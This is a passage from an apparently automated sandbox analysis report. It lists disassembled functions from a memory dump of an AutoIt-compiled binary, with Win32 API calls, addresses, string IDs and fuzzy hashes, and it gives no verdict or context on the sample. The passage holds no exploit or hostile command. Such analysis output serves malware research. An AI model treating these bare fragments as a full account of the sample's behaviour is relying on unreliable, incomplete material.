                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-3738523708
                                                    • Opcode ID: fd89bedd7e293d7d51a47cb9d738572358e26f5c4a3996b31da02df98834fbab
                                                    • Instruction ID: d9a1f53f19d04cbd18faa53f431aeb3d42ae85bd408e226fa04147347b04146a
                                                    • Opcode Fuzzy Hash: fd89bedd7e293d7d51a47cb9d738572358e26f5c4a3996b31da02df98834fbab
                                                    • Instruction Fuzzy Hash: 6702AC30148341DFC724EF24C895AAFBBE5BF89710F10491DF49A932A2DB38DA49CB52
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,00800980), ref: 007DAF4E
                                                    • GetDriveTypeW.KERNEL32(00000061,0082B5F0,00000061), ref: 007DB018
                                                    • _wcscpy.LIBCMT ref: 007DB042
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: 577936cbe1420ba263fb0528c734f974c5889151e6bb508ac60a045ba970d6b4
                                                    • Instruction ID: 91692bd531f0ce67243e78a726fbef7a8b8890a148ff5b195ce83951b3d600f2
                                                    • Opcode Fuzzy Hash: 577936cbe1420ba263fb0528c734f974c5889151e6bb508ac60a045ba970d6b4
                                                    • Instruction Fuzzy Hash: 7A51EF30218305EFCB14EF14D885AAAB7B5FF90340F54481EF595972A2DB38ED49CB82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    • Opcode ID: de1192cb3831894783ad2e0c30983c70bad5f58eeae5efae66e87d27f52c1aeb
                                                    • Instruction ID: 02d3b7bfc699523b2950388b193e9602c3f4e59b634afa4aa0057720491e813d
                                                    • Opcode Fuzzy Hash: de1192cb3831894783ad2e0c30983c70bad5f58eeae5efae66e87d27f52c1aeb
                                                    • Instruction Fuzzy Hash: A141E571604609EFDF34EF64D845E7973E8EB45340F20856AE18ED7292EB399D428711
                                                    APIs
                                                    • _memset.LIBCMT ref: 007F778F
                                                    • CreateMenu.USER32 ref: 007F77AA
                                                    • SetMenu.USER32(?,00000000), ref: 007F77B9
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7846
                                                    • IsMenu.USER32(?), ref: 007F785C
                                                    • CreatePopupMenu.USER32 ref: 007F7866
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F7893
                                                    • DrawMenuBar.USER32 ref: 007F789B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F
                                                    • API String ID: 176399719-3044882817
                                                    • Opcode ID: 45bdfe48e7a98d2ef8e4d578c88337905aef9755518ba52eb8a219b7176174cc
                                                    • Instruction ID: 138b0d3346fbdf41ed4111f537087f3bd4b1c86b8329cf4e8dec98c553369f0a
                                                    • Opcode Fuzzy Hash: 45bdfe48e7a98d2ef8e4d578c88337905aef9755518ba52eb8a219b7176174cc
                                                    • Instruction Fuzzy Hash: AF414974A04209EFEB24DF64D888BAABBF5FF49350F144429FA45A7361D735A910CFA0
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007F7B83
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 007F7B8A
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007F7B9D
                                                    • SelectObject.GDI32(00000000,00000000), ref: 007F7BA5
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007F7BB0
                                                    • DeleteDC.GDI32(00000000), ref: 007F7BB9
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 007F7BC3
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007F7BD7
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007F7BE3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
                                                    • Instruction ID: 76c249524833553c62c1e9abc6d50fcc9076b0416dea84c603e095a1d989e9ec
                                                    • Opcode Fuzzy Hash: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
                                                    • Instruction Fuzzy Hash: DC318D72104219AFDF159F64DC49FEB3B69FF0A320F110215FA65A22A0CB39D821DFA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 0079706B
                                                      • Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58
                                                    • __gmtime64_s.LIBCMT ref: 00797104
                                                    • __gmtime64_s.LIBCMT ref: 0079713A
                                                    • __gmtime64_s.LIBCMT ref: 00797157
                                                    • __allrem.LIBCMT ref: 007971AD
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971C9
                                                    • __allrem.LIBCMT ref: 007971E0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971FE
                                                    • __allrem.LIBCMT ref: 00797215
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797233
                                                    • __invoke_watson.LIBCMT ref: 007972A4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                    • Instruction ID: d56ffec24a5b46b2d32a5b15fd797d6c77ce4b7e26f7564e8041e8fa8b87022e
                                                    • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                    • Instruction Fuzzy Hash: 54710671A14706EBDB189F7DEC46B6AB3B9BF81320F14422AF514E7281E778DA00C790
                                                    APIs
                                                    • _memset.LIBCMT ref: 007D2CE9
                                                    • GetMenuItemInfoW.USER32(00837890,000000FF,00000000,00000030), ref: 007D2D4A
                                                    • SetMenuItemInfoW.USER32(00837890,00000004,00000000,00000030), ref: 007D2D80
                                                    • Sleep.KERNEL32(000001F4), ref: 007D2D92
                                                    • GetMenuItemCount.USER32(?), ref: 007D2DD6
                                                    • GetMenuItemID.USER32(?,00000000), ref: 007D2DF2
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 007D2E1C
                                                    • GetMenuItemID.USER32(?,?), ref: 007D2E61
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D2EA7
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EBB
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EDC
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
                                                    • Instruction ID: 43c4fd2e697c085e75633bca962331bd9350d0e81cc07e2e65b58243ab11e9c1
                                                    • Opcode Fuzzy Hash: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
                                                    • Instruction Fuzzy Hash: 2B619EB0A00249AFDB21DF64CD88ABEBBB9FB50304F14045AF841A7352D739AD07DB21
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F75CA
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F75CD
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 007F75F1
                                                    • _memset.LIBCMT ref: 007F7602
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F7614
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F768C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
                                                    • Instruction ID: ee08c96061a6ad169752113fdd0781ef5cd262a24be447221a50085855a2c592
                                                    • Opcode Fuzzy Hash: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
                                                    • Instruction Fuzzy Hash: 23616975904208AFDB20DFA8CC85EFE77B8EB49710F1001A9FA15A73A1D774AE51DB60
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007C77DD
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 007C7836
                                                    • VariantInit.OLEAUT32(?), ref: 007C7848
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 007C7868
                                                    • VariantCopy.OLEAUT32(?,?), ref: 007C78BB
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 007C78CF
                                                    • VariantClear.OLEAUT32(?), ref: 007C78E4
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 007C78F1
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C78FA
                                                    • VariantClear.OLEAUT32(?), ref: 007C790C
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C7917
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 42cea9379a5a9137039b143b6271dea24f206b144ef60a8e2b9d422fd59f7864
                                                    • Instruction ID: e786ac427cf10498b319620510601d2857bb019a2485adec3b638b5c167dca47
                                                    • Opcode Fuzzy Hash: 42cea9379a5a9137039b143b6271dea24f206b144ef60a8e2b9d422fd59f7864
                                                    • Instruction Fuzzy Hash: 9B414235A04219DFCF14DFA4D888EADBBB9FF48354F00806DEA55A7261CB34A945CFA4
                                                    APIs
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                    • CoInitialize.OLE32 ref: 007E8AED
                                                    • CoUninitialize.OLE32 ref: 007E8AF8
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00803BBC,?), ref: 007E8B58
                                                    • IIDFromString.OLE32(?,?), ref: 007E8BCB
                                                    • VariantInit.OLEAUT32(?), ref: 007E8C65
                                                    • VariantClear.OLEAUT32(?), ref: 007E8CC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 313dfce8457830488872debdc111a15e79cd9e1b7083a66cbdf65c0e079fcc6f
                                                    • Instruction ID: 9284c0239852e51d819c4afa08d894dc41f729b47dcd85d4937b814aea90f3fd
                                                    • Opcode Fuzzy Hash: 313dfce8457830488872debdc111a15e79cd9e1b7083a66cbdf65c0e079fcc6f
                                                    • Instruction Fuzzy Hash: E461AAB0206751DFC750DF11C888B6AB7E8BF49714F104859F9899B2A1CB78ED44CBA3
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 007DBB13
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007DBB89
                                                    • GetLastError.KERNEL32 ref: 007DBB93
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 007DBC00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
                                                    • Instruction ID: b61998826151320a30230ac1b7af2affcaec6c57cdc21fc95ea4597566a5919f
                                                    • Opcode Fuzzy Hash: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
                                                    • Instruction Fuzzy Hash: 4E31AF75A00209EFCB10EF64C849EA9B7B8FF44300F55806BE806E7395DB789941CB90
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C9BCC
                                                    • GetDlgCtrlID.USER32 ref: 007C9BD7
                                                    • GetParent.USER32 ref: 007C9BF3
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9BF6
                                                    • GetDlgCtrlID.USER32(?), ref: 007C9BFF
                                                    • GetParent.USER32(?), ref: 007C9C1B
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9C1E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
                                                    • Instruction ID: 777f8d99eb0f50a9f262169d886de38a5838effd227dbe0c07db4158f062618e
                                                    • Opcode Fuzzy Hash: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
                                                    • Instruction Fuzzy Hash: 1B21C170940204BBCF04EBA0DC89EFEBBB9EF95310F50025AF96193291EB7958159B20
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C9CB5
                                                    • GetDlgCtrlID.USER32 ref: 007C9CC0
                                                    • GetParent.USER32 ref: 007C9CDC
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9CDF
                                                    • GetDlgCtrlID.USER32(?), ref: 007C9CE8
                                                    • GetParent.USER32(?), ref: 007C9D04
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9D07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
                                                    • Instruction ID: abec542faebebdc4988d6bf674f3035a6fd95b87b7908d869780c1b0496dcd10
                                                    • Opcode Fuzzy Hash: 7f0a93da48744cd75a9da76b7c873e8ab4f134e8ccb144190f55e0c17626d64c
                                                    • Instruction Fuzzy Hash: EA21A175A40204BBDF54ABB0CC89FFEBBB9EF94300F500119B96197291EB7989259B20
                                                    APIs
                                                    • GetParent.USER32 ref: 007C9D27
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 007C9D3C
                                                    • _wcscmp.LIBCMT ref: 007C9D4E
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007C9DC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: 6d8507f9818454f56699e90a2eadf89b2230e42dcb611c3d06c5546e1ed0bebb
                                                    • Instruction ID: a76be39da19bdaf96801b499dd14ebdda5ce4ee6efddf1258a8ea694d689aaf7
                                                    • Opcode Fuzzy Hash: 6d8507f9818454f56699e90a2eadf89b2230e42dcb611c3d06c5546e1ed0bebb
                                                    • Instruction Fuzzy Hash: 6A11C476348716FAEA442660FC0EEA67398EF05720B20001EFA21B41E1FE6E6A515991
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 007E8FC1
                                                    • CoInitialize.OLE32(00000000), ref: 007E8FEE
                                                    • CoUninitialize.OLE32 ref: 007E8FF8
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 007E90F8
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 007E9225
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00803BDC), ref: 007E9259
                                                    • CoGetObject.OLE32(?,00000000,00803BDC,?), ref: 007E927C
                                                    • SetErrorMode.KERNEL32(00000000), ref: 007E928F
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E930F
                                                    • VariantClear.OLEAUT32(?), ref: 007E931F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID:
                                                    • API String ID: 2395222682-0
                                                    • Opcode ID: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
                                                    • Instruction ID: 6349fdbc07074a89d64d6296bbec5ddc9c05139d1d1c5db976d0e562e139f547
                                                    • Opcode Fuzzy Hash: afbf60e2fc6bd1119ba0afaa8342cca08efc3a4103f494cc65cdc5e8fc298e13
                                                    • Instruction Fuzzy Hash: 82C11372608345AFC740DF65C88892AB7E9FF89348F00491DFA8A9B251DB75ED05CB52
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 007D19EF
